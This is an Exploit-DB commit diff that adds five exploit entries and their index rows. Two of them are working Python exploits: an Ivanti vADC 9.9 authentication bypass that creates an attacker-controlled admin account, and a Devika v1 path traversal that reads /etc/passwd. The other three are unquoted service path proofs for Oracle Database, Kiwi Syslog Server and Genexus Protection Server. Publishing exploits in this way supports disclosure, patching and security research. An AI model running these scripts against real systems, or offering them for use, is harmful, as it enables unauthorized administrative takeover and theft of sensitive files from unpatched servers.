DB: 2024-08-05

6 changes to exploits/shellcodes/ghdb

Ivanti vADC 9.9 - Authentication Bypass

Devika v1 - Path Traversal via 'snapshot_path'

Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

Oracle Database 12c Release 1 - Unquoted Service Path

SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path

exploits/multiple/webapps/52062.py

@@ -0,0 +1,48 @@
+# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
+# Date: 2024-08-03
+# Exploit Author: ohnoisploited
+# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
+# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
+# Version: 9.9
+# Tested on: Linux
+# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
+# Fixed versions: 22.7R2+
+
+import requests
+
+# Set to target address
+admin_portal = 'https://192.168.88.130:9090'
+
+# User to create
+new_admin_name = 'newadmin'
+new_admin_password = 'newadmin1234'
+
+requests.packages.urllib3.disable_warnings()
+session = requests.Session()
+
+# Setting 'error' bypasses access control for wizard.fcgi.
+# wizard.fcgi can load any section in the web interface.
+params = { 'error': 1,
+          'section': 'Access Management:LocalUsers' }
+
+# Create new user request
+# _form_submitted to bypass CSRF
+data = {  '_form_submitted': 'form',
+          'create_user': 'Create',
+          'group': 'admin',
+          'newusername': new_admin_name,
+          'password1': new_admin_password,
+          'password2': new_admin_password }
+
+# Post request
+r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)
+
+# View response
+content = r.content.decode('utf-8')
+print(content)
+
+if r.status_code == 200 and '<title>2<' in content:
+    print("New user request sent")
+    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
+else:
+    print("Unable to create new user")

exploits/python/webapps/52066.py

@@ -0,0 +1,31 @@
+# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
+# Google Dork: N/A
+# Date: 2024-06-29
+# Exploit Author: Alperen Ergel
+# Contact: @alpernae (IG/X)
+# Vendor Homepage: https://devikaai.co/
+# Software Link: https://github.com/stitionai/devika
+# Version: v1
+# Tested on: Windows 11 Home Edition
+# CVE: CVE-2024-40422
+
+#!/usr/bin/python
+
+import argparse
+import requests
+
+def exploit(target_url):
+    url = f'http://{target_url}/api/get-browser-snapshot'
+    params = {
+        'snapshot_path': '../../../../etc/passwd'
+    }
+
+    response = requests.get(url, params=params)
+    print(response.text)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
+    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
+    args = parser.parse_args()
+
+    exploit(args.target)

exploits/windows/local/52063.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
+# Date: 2024-07-31
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Vendor Homepage: https://www.oracle.com/
+# Software Link: https://www.oracle.com/
+# Version: 12c Release 1
+# Tested on: Windows 10 Pro x64
+
+C:\>sc qc "OracleDBConsoleorcl"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OracleDBConsoleorcl
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   :
+C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OracleDBConsoleorcl
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+OS Name:  Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation

exploits/windows/local/52064.txt

@@ -0,0 +1,40 @@
+# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path
+# Date: 2024-07-31
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Vendor Homepage: https://www.kiwisyslog.com/
+# Software Link: https://www.kiwisyslog.com/downloads
+# Version: Software Version 9.6.7.1
+# Tested on: Windows 10 Pro x64
+
+1. Description:
+
+SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage
+syslog messages, SNMP traps, and Windows event logs
+
+
+2. Proof
+
+C:\>sc qc "Kiwi Syslog Server"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Kiwi Syslog Server
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files
+(x86)\Syslogd\Syslogd_Service.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Kiwi Syslog Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\>systeminfo
+
+OS Name:  Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation

exploits/windows/local/52065.txt

@@ -0,0 +1,26 @@
+#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2024-07-31
+#Vendor : Genexus
+#Version : Genexus Protection Server 9.7.2.10
+#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
+#Vendor Homepage :  https://www.genexus.com/es/
+#Tested on OS: Windows 10 Pro
+
+#Analyze PoC :
+==============
+
+C:\>sc qc protsrvservice
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: protsrvservice
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : ProtSrvService
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem

files_exploits.csv

@@ -11970,6 +11970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple,,2004-11-30,2013-03-15,1,CVE-2004-1210;OSVDB-12243,,,,,https://www.securityfocus.com/bid/11779/info
 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
 50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
+52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
 36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@@ -34968,6 +34969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51636,exploits/python/webapps/51636.txt,"copyparty 1.8.2 - Directory Traversal",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,,,,,,
 51635,exploits/python/webapps/51635.txt,"copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,CVE-2023-38501,,,,,
 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,,
+52066,exploits/python/webapps/52066.py,"Devika v1 - Path Traversal via 'snapshot_path'",2024-08-04,"Alperen Ergel",webapps,python,,2024-08-04,2024-08-04,0,CVE-2024-40422,,,,,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
@@ -40417,6 +40419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
 51641,exploits/windows/local/51641.py,"General Device Manager 2.5.2.2 - Buffer Overflow (SEH)",2023-07-31,"Ahmet Ümit BAYRAM",local,windows,,2023-07-31,2023-07-31,0,,,,,,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
+52065,exploits/windows/local/52065.txt,"Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path",2024-08-04,SamAlucard,local,windows,,2024-08-04,2024-08-04,0,,,,,,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
@@ -41422,6 +41425,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16169,exploits/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow",2011-02-15,mr_me,local,windows,,2011-02-15,2011-03-04,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-03-04-at-14953-pm.png,,
 21044,exploits/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",local,windows,,2001-08-02,2012-09-03,1,CVE-2001-0941;OSVDB-9432,,,,,https://www.securityfocus.com/bid/3138/info
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,,2020-05-05,2020-05-05,0,,,,,,
+52063,exploits/windows/local/52063.txt,"Oracle Database 12c Release 1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,,
 933,exploits/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections s",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,,,,,,
 932,exploits/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Local Buffer Overflow",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,OSVDB-9866,,,,,
 1455,exploits/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow",2006-01-26,Argeniss,local,windows,,2006-01-25,,1,OSVDB-22572;CVE-2006-0287,,,,,http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
@@ -41735,6 +41739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",2021-10-14,"Mert Daş",local,windows,,2021-10-14,2021-10-14,0,,,,,,
 47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,,2019-11-08,2019-11-08,0,,,,,,
 40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows,,2016-09-19,2016-09-19,0,,,,,,
+52064,exploits/windows/local/52064.txt,"SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,,2020-05-11,2020-05-12,0,CVE-2020-12608,,,,,
 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows,,2010-01-21,,1,OSVDB-64368,,,,http://www.exploit-db.comsompl1_0.rar,
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,,2020-07-17,2020-07-17,0,,,,,,